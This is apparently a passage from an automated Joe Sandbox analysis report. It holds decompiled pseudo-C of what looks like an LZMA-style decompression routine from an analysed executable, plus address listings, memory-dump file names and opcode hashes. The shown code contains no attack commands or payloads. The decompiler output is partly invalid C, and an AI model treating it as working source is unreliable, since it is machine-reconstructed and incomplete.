                                                            												L76:
                                                            												__eflags =  *(__ebp - 0x64);
                                                            												if( *(__ebp - 0x64) == 0) {
                                                            													 *(__ebp - 0x88) = 0x1b;
                                                            													goto L170;
                                                            												}
                                                            												__eax =  *(__ebp - 0x14);
                                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            												__eflags = __eax -  *(__ebp - 0x74);
                                                            												if(__eax >=  *(__ebp - 0x74)) {
                                                            													__eax = __eax +  *(__ebp - 0x74);
                                                            													__eflags = __eax;
                                                            												}
                                                            												__edx =  *(__ebp - 8);
                                                            												__cl =  *(__eax + __edx);
                                                            												__eax =  *(__ebp - 0x14);
                                                            												 *(__ebp - 0x5c) = __cl;
                                                            												 *(__eax + __edx) = __cl;
                                                            												__eax = __eax + 1;
                                                            												__edx = 0;
                                                            												_t275 = __eax %  *(__ebp - 0x74);
                                                            												__eax = __eax /  *(__ebp - 0x74);
                                                            												__edx = _t275;
                                                            												__eax =  *(__ebp - 0x68);
                                                            												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            												_t284 = __ebp - 0x64;
                                                            												 *_t284 =  *(__ebp - 0x64) - 1;
                                                            												__eflags =  *_t284;
                                                            												 *( *(__ebp - 0x68)) = __cl;
                                                            												L80:
                                                            												 *(__ebp - 0x14) = __edx;
                                                            												goto L81;
                                                            											case 0x1c:
                                                            												while(1) {
                                                            													L123:
                                                            													__eflags =  *(__ebp - 0x64);
                                                            													if( *(__ebp - 0x64) == 0) {
                                                            														break;
                                                            													}
                                                            													__eax =  *(__ebp - 0x14);
                                                            													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            													__eflags = __eax -  *(__ebp - 0x74);
                                                            													if(__eax >=  *(__ebp - 0x74)) {
                                                            														__eax = __eax +  *(__ebp - 0x74);
                                                            														__eflags = __eax;
                                                            													}
                                                            													__edx =  *(__ebp - 8);
                                                            													__cl =  *(__eax + __edx);
                                                            													__eax =  *(__ebp - 0x14);
                                                            													 *(__ebp - 0x5c) = __cl;
                                                            													 *(__eax + __edx) = __cl;
                                                            													__eax = __eax + 1;
                                                            													__edx = 0;
                                                            													_t414 = __eax %  *(__ebp - 0x74);
                                                            													__eax = __eax /  *(__ebp - 0x74);
                                                            													__edx = _t414;
                                                            													__eax =  *(__ebp - 0x68);
                                                            													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                            													__eflags =  *(__ebp - 0x30);
                                                            													 *( *(__ebp - 0x68)) = __cl;
                                                            													 *(__ebp - 0x14) = _t414;
                                                            													if( *(__ebp - 0x30) > 0) {
                                                            														continue;
                                                            													} else {
                                                            														L81:
                                                            														 *(__ebp - 0x88) = 2;
                                                            														goto L1;
                                                            													}
                                                            												}
                                                            												 *(__ebp - 0x88) = 0x1c;
                                                            												goto L170;
                                                            										}
                                                            									}
                                                            									L171:
                                                            									_t535 = _t534 | 0xffffffff;
                                                            									goto L172;
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            					goto L1;
                                                            				}
                                                            			}













                                                            0x00000000
                                                            0x00406675
                                                            0x00406675
                                                            0x00406679
                                                            0x00406686
                                                            0x00406690
                                                            0x00000000
                                                            0x0040667b
                                                            0x0040667b
                                                            0x004066b6
                                                            0x004066b9
                                                            0x004066bc
                                                            0x004066bf
                                                            0x004066bf
                                                            0x004066c2
                                                            0x004066c9
                                                            0x004066ce
                                                            0x004065af
                                                            0x004065b2
                                                            0x00406924
                                                            0x00406924
                                                            0x00406924
                                                            0x00406927
                                                            0x00406927
                                                            0x00406927
                                                            0x0040692d
                                                            0x00406933
                                                            0x00406939
                                                            0x00406953
                                                            0x00406956
                                                            0x0040695c
                                                            0x00406967
                                                            0x00406969
                                                            0x0040693b
                                                            0x0040693b
                                                            0x0040694a
                                                            0x0040694e
                                                            0x0040694e
                                                            0x00406973
                                                            0x00000000
                                                            0x00000000
                                                            0x00406975
                                                            0x00406979
                                                            0x00406b28
                                                            0x00406b3e
                                                            0x00406b46
                                                            0x00406b4d
                                                            0x00406b4f
                                                            0x00406b56
                                                            0x00406b5a
                                                            0x00406b5a
                                                            0x00406985
                                                            0x0040698c
                                                            0x00406994
                                                            0x00406997
                                                            0x0040699a
                                                            0x0040699a
                                                            0x004069a0
                                                            0x004069a0
                                                            0x0040613c
                                                            0x0040613c
                                                            0x0040613c
                                                            0x00406145
                                                            0x00000000
                                                            0x00000000
                                                            0x0040614b
                                                            0x00000000
                                                            0x00406156
                                                            0x00000000
                                                            0x00000000
                                                            0x0040615f
                                                            0x00406162
                                                            0x00406165
                                                            0x00406169
                                                            0x00000000
                                                            0x00000000
                                                            0x0040616f
                                                            0x00406172
                                                            0x00406174
                                                            0x00406175
                                                            0x00406178
                                                            0x0040617a
                                                            0x0040617b
                                                            0x0040617d
                                                            0x00406180
                                                            0x00406185
                                                            0x0040618a
                                                            0x00406193
                                                            0x004061a6
                                                            0x004061a9
                                                            0x004061b5
                                                            0x004061dd
                                                            0x004061df
                                                            0x004061ed
                                                            0x004061ed
                                                            0x004061f1
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004061e1
                                                            0x004061e1
                                                            0x004061e4
                                                            0x004061e5
                                                            0x004061e5
                                                            0x00000000
                                                            0x004061e1
                                                            0x004061bb
                                                            0x004061c0
                                                            0x004061c0
                                                            0x004061c9
                                                            0x004061d1
                                                            0x004061d4
                                                            0x00000000
                                                            0x004061da
                                                            0x004061da
                                                            0x00000000
                                                            0x004061da
                                                            0x00000000
                                                            0x004061f7
                                                            0x004061f7
                                                            0x004061fb
                                                            0x00406aa7
                                                            0x00000000
                                                            0x00406aa7
                                                            0x00406204
                                                            0x00406214
                                                            0x00406217
                                                            0x0040621a
                                                            0x0040621a
                                                            0x0040621a
                                                            0x0040621d
                                                            0x00406221
                                                            0x00000000
                                                            0x00000000
                                                            0x00406223
                                                            0x00406229
                                                            0x00406253
                                                            0x00406259
                                                            0x00406260
                                                            0x00000000
                                                            0x00406260
                                                            0x0040622f
                                                            0x00406232
                                                            0x00406237
                                                            0x00406237
                                                            0x00406242
                                                            0x0040624a
                                                            0x0040624d
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406292
                                                            0x00406298
                                                            0x0040629b
                                                            0x004062a8
                                                            0x004062b0
                                                            0x00406924
                                                            0x00406924
                                                            0x00000000
                                                            0x00000000
                                                            0x00406267
                                                            0x00406267
                                                            0x0040626b
                                                            0x00406ab6
                                                            0x00000000
                                                            0x00406ab6
                                                            0x00406277
                                                            0x00406282
                                                            0x00406282
                                                            0x00406282
                                                            0x00406285
                                                            0x00406288
                                                            0x0040628b
                                                            0x00406290
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406927
                                                            0x00406927
                                                            0x0040692d
                                                            0x00406933
                                                            0x00406939
                                                            0x00406953
                                                            0x00406956
                                                            0x0040695c
                                                            0x00406967
                                                            0x00406969
                                                            0x0040693b
                                                            0x0040693b
                                                            0x0040694a
                                                            0x0040694e
                                                            0x0040694e
                                                            0x00406973
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004062b8
                                                            0x004062ba
                                                            0x004062bd
                                                            0x0040632e
                                                            0x00406331
                                                            0x00406334
                                                            0x0040633b
                                                            0x00406345
                                                            0x00406924
                                                            0x00406924
                                                            0x00406924
                                                            0x00000000
                                                            0x00406924
                                                            0x00406924
                                                            0x004062bf
                                                            0x004062c3
                                                            0x004062c6
                                                            0x004062c8
                                                            0x004062cb
                                                            0x004062ce
                                                            0x004062d0
                                                            0x004062d3
                                                            0x004062d5
                                                            0x004062da
                                                            0x004062dd
                                                            0x004062e0
                                                            0x004062e4
                                                            0x004062eb
                                                            0x004062ee
                                                            0x004062f5
                                                            0x004062f9
                                                            0x00406301
                                                            0x00406301
                                                            0x00406301
                                                            0x004062fb
                                                            0x004062fb
                                                            0x004062fb
                                                            0x004062f0
                                                            0x004062f0
                                                            0x004062f0
                                                            0x00406305
                                                            0x00406308
                                                            0x00406326
                                                            0x00406328
                                                            0x00000000
                                                            0x0040630a
                                                            0x0040630a
                                                            0x0040630d
                                                            0x00406310
                                                            0x00406313
                                                            0x00406315
                                                            0x00406315
                                                            0x00406315
                                                            0x00406318
                                                            0x0040631b
                                                            0x0040631d
                                                            0x0040631e
                                                            0x00406321
                                                            0x00000000
                                                            0x00406321
                                                            0x00000000
                                                            0x00406557
                                                            0x0040655b
                                                            0x00406579
                                                            0x0040657c
                                                            0x00406583
                                                            0x00406586
                                                            0x00406589
                                                            0x0040658c
                                                            0x0040658f
                                                            0x00406592
                                                            0x00406594
                                                            0x0040659b
                                                            0x0040659c
                                                            0x0040659e
                                                            0x004065a1
                                                            0x004065a4
                                                            0x004065a7
                                                            0x004065a7
                                                            0x004065ac
                                                            0x00000000
                                                            0x004065ac
                                                            0x0040655d
                                                            0x00406560
                                                            0x00406563
                                                            0x0040656d
                                                            0x00406924
                                                            0x00406924
                                                            0x00406924
                                                            0x00000000
                                                            0x00406924
                                                            0x00000000
                                                            0x004065c1
                                                            0x004065c5
                                                            0x004065e8
                                                            0x004065eb
                                                            0x004065ee
                                                            0x004065f8
                                                            0x004065c7
                                                            0x004065c7
                                                            0x004065ca
                                                            0x004065cd
                                                            0x004065d0
                                                            0x004065dd
                                                            0x004065e0
                                                            0x004065e0
                                                            0x00406924
                                                            0x00406924
                                                            0x00406924
                                                            0x00000000
                                                            0x00406924
                                                            0x00000000
                                                            0x00406604
                                                            0x00406608
                                                            0x00000000
                                                            0x00000000
                                                            0x0040660e
                                                            0x00406612
                                                            0x00000000
                                                            0x00000000
                                                            0x00406618
                                                            0x0040661a
                                                            0x0040661e
                                                            0x0040661e
                                                            0x00406621
                                                            0x00406625
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040669c
                                                            0x004066a0
                                                            0x004066a7
                                                            0x004066aa
                                                            0x004066ad
                                                            0x004066a2
                                                            0x004066a2
                                                            0x004066a2
                                                            0x004066b0
                                                            0x004066b3
                                                            0x00000000
                                                            0x00000000
                                                            0x0040675c
                                                            0x0040675c
                                                            0x00406760
                                                            0x00406afe
                                                            0x00000000
                                                            0x00406afe
                                                            0x00406766
                                                            0x00406769
                                                            0x0040676c
                                                            0x00406770
                                                            0x00406773
                                                            0x00406779
                                                            0x0040677b
                                                            0x0040677b
                                                            0x0040677b
                                                            0x0040677e
                                                            0x00406781
                                                            0x00000000
                                                            0x00000000
                                                            0x00406351
                                                            0x00406351
                                                            0x00406355
                                                            0x00406ac2
                                                            0x00000000
                                                            0x00406ac2
                                                            0x0040635b
                                                            0x0040635e
                                                            0x00406361
                                                            0x00406365
                                                            0x00406368
                                                            0x0040636e
                                                            0x00406370
                                                            0x00406370
                                                            0x00406370
                                                            0x00406373
                                                            0x00406376
                                                            0x00406376
                                                            0x00406379
                                                            0x0040637c
                                                            0x00000000
                                                            0x00000000
                                                            0x00406382
                                                            0x00406388
                                                            0x00000000
                                                            0x00000000
                                                            0x0040638e
                                                            0x0040638e
                                                            0x00406392
                                                            0x00406395
                                                            0x00406398
                                                            0x0040639b
                                                            0x0040639e
                                                            0x0040639f
                                                            0x004063a2
                                                            0x004063a4
                                                            0x004063aa
                                                            0x004063ad
                                                            0x004063b0
                                                            0x004063b3
                                                            0x004063b6
                                                            0x004063b9
                                                            0x004063bc
                                                            0x004063d8
                                                            0x004063db
                                                            0x004063de
                                                            0x004063e1
                                                            0x004063e8
                                                            0x004063ec
                                                            0x004063ee
                                                            0x004063f2
                                                            0x004063be
                                                            0x004063be
                                                            0x004063c2
                                                            0x004063ca
                                                            0x004063cf
                                                            0x004063d1
                                                            0x004063d3
                                                            0x004063d3
                                                            0x004063f5
                                                            0x004063fc
                                                            0x004063ff
                                                            0x00000000
                                                            0x00406405
                                                            0x00000000
                                                            0x00406405
                                                            0x00000000
                                                            0x0040640a
                                                            0x0040640a
                                                            0x0040640e
                                                            0x00406ace
                                                            0x00000000
                                                            0x00406ace
                                                            0x00406414
                                                            0x00406417
                                                            0x0040641a
                                                            0x0040641e
                                                            0x00406421
                                                            0x00406427
                                                            0x00406429
                                                            0x00406429
                                                            0x00406429
                                                            0x0040642c
                                                            0x0040642f
                                                            0x0040642f
                                                            0x0040642f
                                                            0x00406435
                                                            0x00000000
                                                            0x00000000
                                                            0x00406437
                                                            0x0040643a
                                                            0x0040643d
                                                            0x00406440
                                                            0x00406443
                                                            0x00406446
                                                            0x00406449
                                                            0x0040644c
                                                            0x0040644f
                                                            0x00406452
                                                            0x00406455
                                                            0x0040646d
                                                            0x00406470
                                                            0x00406473
                                                            0x00406476
                                                            0x00406476
                                                            0x00406479
                                                            0x0040647d
                                                            0x0040647f
                                                            0x00406457
                                                            0x00406457
                                                            0x0040645f
                                                            0x00406464
                                                            0x00406466
                                                            0x00406468
                                                            0x00406468
                                                            0x00406482
                                                            0x00406489
                                                            0x0040648c
                                                            0x00000000
                                                            0x0040648e
                                                            0x00000000
                                                            0x0040648e
                                                            0x0040648c
                                                            0x00406493
                                                            0x00406493
                                                            0x00406493
                                                            0x00406493
                                                            0x00000000
                                                            0x00000000
                                                            0x004064ce
                                                            0x004064ce
                                                            0x004064d2
                                                            0x00406ada
                                                            0x00000000
                                                            0x00406ada
                                                            0x004064d8
                                                            0x004064db
                                                            0x004064de
                                                            0x004064e2
                                                            0x004064e5
                                                            0x004064eb
                                                            0x004064ed
                                                            0x004064ed
                                                            0x004064ed
                                                            0x004064f0
                                                            0x004064f3
                                                            0x004064f3
                                                            0x004064f9
                                                            0x00406497
                                                            0x00406497
                                                            0x0040649a
                                                            0x00000000
                                                            0x0040649a
                                                            0x004064fb
                                                            0x004064fb
                                                            0x004064fe
                                                            0x00406501
                                                            0x00406504
                                                            0x00406507
                                                            0x0040650a
                                                            0x0040650d
                                                            0x00406510
                                                            0x00406513
                                                            0x00406516
                                                            0x00406519
                                                            0x00406531
                                                            0x00406534
                                                            0x00406537
                                                            0x0040653a
                                                            0x0040653a
                                                            0x0040653d
                                                            0x00406541
                                                            0x00406543
                                                            0x0040651b
                                                            0x0040651b
                                                            0x00406523
                                                            0x00406528
                                                            0x0040652a
                                                            0x0040652c
                                                            0x0040652c
                                                            0x00406546
                                                            0x0040654d
                                                            0x00406550
                                                            0x00000000
                                                            0x00406552
                                                            0x00000000
                                                            0x00406552
                                                            0x00000000
                                                            0x004067df
                                                            0x004067df
                                                            0x004067e3
                                                            0x00406b0a
                                                            0x00000000
                                                            0x00406b0a
                                                            0x004067e9
                                                            0x004067ec
                                                            0x004067ef
                                                            0x004067f3
                                                            0x004067f6
                                                            0x004067fc
                                                            0x004067fe
                                                            0x004067fe
                                                            0x004067fe
                                                            0x00406801
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004068ee
                                                            0x004068f2
                                                            0x00406914
                                                            0x00406917
                                                            0x00406921
                                                            0x00406924
                                                            0x00406924
                                                            0x00406924
                                                            0x00000000
                                                            0x00406924
                                                            0x00406924
                                                            0x004068f4
                                                            0x004068f7
                                                            0x004068fb
                                                            0x004068fe
                                                            0x004068fe
                                                            0x00406901
                                                            0x00000000
                                                            0x00000000
                                                            0x004069ab
                                                            0x004069af
                                                            0x004069cd
                                                            0x004069cd
                                                            0x004069cd
                                                            0x004069d4
                                                            0x004069db
                                                            0x004069e2
                                                            0x004069e2
                                                            0x00000000
                                                            0x004069e2
                                                            0x004069b1
                                                            0x004069b4
                                                            0x004069b7
                                                            0x004069ba
                                                            0x004069c1
                                                            0x00406905
                                                            0x00406905
                                                            0x00406908
                                                            0x00000000
                                                            0x00000000
                                                            0x00406a9c
                                                            0x00406a9f
                                                            0x004069a0
                                                            0x00000000
                                                            0x00000000
                                                            0x004066d6
                                                            0x004066d8
                                                            0x004066df
                                                            0x004066e0
                                                            0x004066e2
                                                            0x004066e5
                                                            0x00000000
                                                            0x00000000
                                                            0x004066ed
                                                            0x004066f0
                                                            0x004066f3
                                                            0x004066f5
                                                            0x004066f7
                                                            0x004066f7
                                                            0x004066f8
                                                            0x004066fb
                                                            0x00406702
                                                            0x00406705
                                                            0x00406713
                                                            0x00000000
                                                            0x00000000
                                                            0x004069e9
                                                            0x004069e9
                                                            0x004069ec
                                                            0x004069f3
                                                            0x00000000
                                                            0x00000000
                                                            0x004069f8
                                                            0x004069f8
                                                            0x004069fc
                                                            0x00406b34
                                                            0x00000000
                                                            0x00406b34
                                                            0x00406a02
                                                            0x00406a05
                                                            0x00406a08
                                                            0x00406a0c
                                                            0x00406a0f
                                                            0x00406a15
                                                            0x00406a17
                                                            0x00406a17
                                                            0x00406a17
                                                            0x00406a1a
                                                            0x00406a1d
                                                            0x00406a1d
                                                            0x00406a1d
                                                            0x00406a1d
                                                            0x00406a20
                                                            0x00406a20
                                                            0x00406a24
                                                            0x00406a84
                                                            0x00406a87
                                                            0x00406a8c
                                                            0x00406a8d
                                                            0x00406a8f
                                                            0x00406a91
                                                            0x00406a94
                                                            0x004069a0
                                                            0x004069a0
                                                            0x00000000
                                                            0x004069a6
                                                            0x004069a0
                                                            0x00406a26
                                                            0x00406a2c
                                                            0x00406a2f
                                                            0x00406a32
                                                            0x00406a35
                                                            0x00406a38
                                                            0x00406a3b
                                                            0x00406a3e
                                                            0x00406a41
                                                            0x00406a44
                                                            0x00406a47
                                                            0x00406a60
                                                            0x00406a63
                                                            0x00406a66
                                                            0x00406a69
                                                            0x00406a6d
                                                            0x00406a6f
                                                            0x00406a6f
                                                            0x00406a70
                                                            0x00406a73
                                                            0x00406a49
                                                            0x00406a49
                                                            0x00406a51
                                                            0x00406a56
                                                            0x00406a58
                                                            0x00406a5b
                                                            0x00406a5b
                                                            0x00406a76
                                                            0x00406a7d
                                                            0x00000000
                                                            0x00406a7f
                                                            0x00000000
                                                            0x00406a7f
                                                            0x00000000
                                                            0x0040671b
                                                            0x0040671e
                                                            0x00406754
                                                            0x00406884
                                                            0x00406884
                                                            0x00406884
                                                            0x00406884
                                                            0x00406887
                                                            0x00406887
                                                            0x0040688a
                                                            0x0040688c
                                                            0x00406b16
                                                            0x00000000
                                                            0x00406b16
                                                            0x00406892
                                                            0x00406895
                                                            0x00000000
                                                            0x00000000
                                                            0x0040689b
                                                            0x0040689f
                                                            0x004068a2
                                                            0x004068a2
                                                            0x004068a2
                                                            0x00000000
                                                            0x004068a2
                                                            0x00406720
                                                            0x00406722
                                                            0x00406724
                                                            0x00406726
                                                            0x00406729
                                                            0x0040672a
                                                            0x0040672c
                                                            0x0040672e
                                                            0x00406731
                                                            0x00406734
                                                            0x0040674a
                                                            0x0040674f
                                                            0x00406787
                                                            0x00406787
                                                            0x0040678b
                                                            0x004067b7
                                                            0x004067b9
                                                            0x004067c0
                                                            0x004067c3
                                                            0x004067c6
                                                            0x004067c6
                                                            0x004067cb
                                                            0x004067cb
                                                            0x004067cd
                                                            0x004067d0
                                                            0x004067d7
                                                            0x004067da
                                                            0x00406807
                                                            0x00406807
                                                            0x0040680a
                                                            0x0040680d
                                                            0x00406881
                                                            0x00406881
                                                            0x00406881
                                                            0x00000000
                                                            0x00406881
                                                            0x0040680f
                                                            0x00406815
                                                            0x00406818
                                                            0x0040681b
                                                            0x0040681e
                                                            0x00406821
                                                            0x00406824
                                                            0x00406827
                                                            0x0040682a
                                                            0x0040682d
                                                            0x00406830
                                                            0x00406849
                                                            0x0040684b
                                                            0x0040684e
                                                            0x0040684f
                                                            0x00406852
                                                            0x00406854
                                                            0x00406857
                                                            0x00406859
                                                            0x0040685b
                                                            0x0040685e
                                                            0x00406860
                                                            0x00406863
                                                            0x00406867
                                                            0x00406869
                                                            0x00406869
                                                            0x0040686a
                                                            0x0040686d
                                                            0x00406870
                                                            0x00406832
                                                            0x00406832
                                                            0x0040683a
                                                            0x0040683f
                                                            0x00406841
                                                            0x00406844
                                                            0x00406844
                                                            0x00406873
                                                            0x0040687a
                                                            0x00406804
                                                            0x00406804
                                                            0x00406804
                                                            0x00406804
                                                            0x00000000
                                                            0x0040687c
                                                            0x00000000
                                                            0x0040687c
                                                            0x0040687a
                                                            0x0040678d
                                                            0x00406790
                                                            0x00406792
                                                            0x00406795
                                                            0x00406798
                                                            0x0040679b
                                                            0x0040679d
                                                            0x004067a0
                                                            0x004067a3
                                                            0x004067a3
                                                            0x004067a6
                                                            0x004067a6
                                                            0x004067a9
                                                            0x004067b0
                                                            0x00406784
                                                            0x00406784
                                                            0x00406784
                                                            0x00406784
                                                            0x00000000
                                                            0x004067b2
                                                            0x00000000
                                                            0x004067b2
                                                            0x004067b0
                                                            0x00406736
                                                            0x00406739
                                                            0x0040673b
                                                            0x0040673e
                                                            0x00000000
                                                            0x00000000
                                                            0x0040649d
                                                            0x0040649d
                                                            0x004064a1
                                                            0x00406ae6
                                                            0x00000000
                                                            0x00406ae6
                                                            0x004064a7
                                                            0x004064aa
                                                            0x004064ad
                                                            0x004064b0
                                                            0x004064b3
                                                            0x004064b6
                                                            0x004064b9
                                                            0x004064bb
                                                            0x004064be
                                                            0x004064c1
                                                            0x004064c4
                                                            0x004064c6
                                                            0x004064c6
                                                            0x004064c6
                                                            0x00000000
                                                            0x00000000
                                                            0x00406628
                                                            0x00406628
                                                            0x0040662c
                                                            0x00406af2
                                                            0x00000000
                                                            0x00406af2
                                                            0x00406632
                                                            0x00406635
                                                            0x00406638
                                                            0x0040663b
                                                            0x0040663d
                                                            0x0040663d
                                                            0x0040663d
                                                            0x00406640
                                                            0x00406643
                                                            0x00406646
                                                            0x00406649
                                                            0x0040664c
                                                            0x0040664f
                                                            0x00406650
                                                            0x00406652
                                                            0x00406652
                                                            0x00406652
                                                            0x00406655
                                                            0x00406658
                                                            0x0040665b
                                                            0x0040665e
                                                            0x0040665e
                                                            0x0040665e
                                                            0x00406661
                                                            0x00406663
                                                            0x00406663
                                                            0x00000000
                                                            0x00000000
                                                            0x004068a5
                                                            0x004068a5
                                                            0x004068a5
                                                            0x004068a9
                                                            0x00000000
                                                            0x00000000
                                                            0x004068af
                                                            0x004068b2
                                                            0x004068b5
                                                            0x004068b8
                                                            0x004068ba
                                                            0x004068ba
                                                            0x004068ba
                                                            0x004068bd
                                                            0x004068c0
                                                            0x004068c3
                                                            0x004068c6
                                                            0x004068c9
                                                            0x004068cc
                                                            0x004068cd
                                                            0x004068cf
                                                            0x004068cf
                                                            0x004068cf
                                                            0x004068d2
                                                            0x004068d5
                                                            0x004068d8
                                                            0x004068db
                                                            0x004068de
                                                            0x004068e2
                                                            0x004068e4
                                                            0x004068e7
                                                            0x00000000
                                                            0x004068e9
                                                            0x00406666
                                                            0x00406666
                                                            0x00000000
                                                            0x00406666
                                                            0x004068e7
                                                            0x00406b1c
                                                            0x00000000
                                                            0x00000000
                                                            0x0040614b
                                                            0x00406b53
                                                            0x00406b53
                                                            0x00000000
                                                            0x00406b53
                                                            0x004069a0
                                                            0x00406927
                                                            0x00406924
                                                            0x00000000
                                                            0x00406679

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 52544ba4eeb4024bb91b054a352ce2e9af5c1c52a3f63a0d20291f7e24db374d
                                                            • Instruction ID: ed3c1b2e2e9110b05ca1f1fb00e1e18bfdebd83ec129b9da7b835b7cf566ec6e
                                                            • Opcode Fuzzy Hash: 52544ba4eeb4024bb91b054a352ce2e9af5c1c52a3f63a0d20291f7e24db374d
                                                            • Instruction Fuzzy Hash: 7D712271E04229CFDF28CFA8C844BADBBB1FB44305F15816AD816BB281D7789996DF44
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 98%
                                                            			E004065C1() {
                                                            				unsigned short _t531;
                                                            				signed int _t532;
                                                            				void _t533;
                                                            				signed int _t534;
                                                            				signed int _t535;
                                                            				signed int _t565;
                                                            				signed int _t568;
                                                            				signed int _t589;
                                                            				signed int* _t606;
                                                            				void* _t613;
                                                            
                                                            				L0:
                                                            				while(1) {
                                                            					L0:
                                                            					if( *(_t613 - 0x40) != 0) {
                                                            						 *(_t613 - 0x84) = 0xa;
                                                            						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                                                            					} else {
                                                            						 *(__ebp - 0x84) = 9;
                                                            						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                            					}
                                                            					while(1) {
                                                            						 *(_t613 - 0x54) = _t606;
                                                            						while(1) {
                                                            							L133:
                                                            							_t531 =  *_t606;
                                                            							_t589 = _t531 & 0x0000ffff;
                                                            							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                            							if( *(_t613 - 0xc) >= _t565) {
                                                            								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                            								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                            								 *(_t613 - 0x40) = 1;
                                                            								_t532 = _t531 - (_t531 >> 5);
                                                            								 *_t606 = _t532;
                                                            							} else {
                                                            								 *(_t613 - 0x10) = _t565;
                                                            								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                            								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                            							}
                                                            							if( *(_t613 - 0x10) >= 0x1000000) {
                                                            								goto L139;
                                                            							}
                                                            							L137:
                                                            							if( *(_t613 - 0x6c) == 0) {
                                                            								 *(_t613 - 0x88) = 5;
                                                            								L170:
                                                            								_t568 = 0x22;
                                                            								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                            								_t535 = 0;
                                                            								L172:
                                                            								return _t535;
                                                            							}
                                                            							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                            							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                            							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                            							L139:
                                                            							_t533 =  *(_t613 - 0x84);
                                                            							while(1) {
                                                            								 *(_t613 - 0x88) = _t533;
                                                            								while(1) {
                                                            									L1:
                                                            									_t534 =  *(_t613 - 0x88);
                                                            									if(_t534 > 0x1c) {
                                                            										break;
                                                            									}
                                                            									switch( *((intOrPtr*)(_t534 * 4 +  &M00406B5B))) {
                                                            										case 0:
                                                            											if( *(_t613 - 0x6c) == 0) {
                                                            												goto L170;
                                                            											}
                                                            											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                            											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                            											_t534 =  *( *(_t613 - 0x70));
                                                            											if(_t534 > 0xe1) {
                                                            												goto L171;
                                                            											}
                                                            											_t538 = _t534 & 0x000000ff;
                                                            											_push(0x2d);
                                                            											asm("cdq");
                                                            											_pop(_t570);
                                                            											_push(9);
                                                            											_pop(_t571);
                                                            											_t609 = _t538 / _t570;
                                                            											_t540 = _t538 % _t570 & 0x000000ff;
                                                            											asm("cdq");
                                                            											_t604 = _t540 % _t571 & 0x000000ff;
                                                            											 *(_t613 - 0x3c) = _t604;
                                                            											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                            											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                            											_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                            											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                            												L10:
                                                            												if(_t612 == 0) {
                                                            													L12:
                                                            													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                            													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                            													goto L15;
                                                            												} else {
                                                            													goto L11;
                                                            												}
                                                            												do {
                                                            													L11:
                                                            													_t612 = _t612 - 1;
                                                            													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                            												} while (_t612 != 0);
                                                            												goto L12;
                                                            											}
                                                            											if( *(_t613 - 4) != 0) {
                                                            												GlobalFree( *(_t613 - 4));
                                                            											}
                                                            											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                            											 *(_t613 - 4) = _t534;
                                                            											if(_t534 == 0) {
                                                            												goto L171;
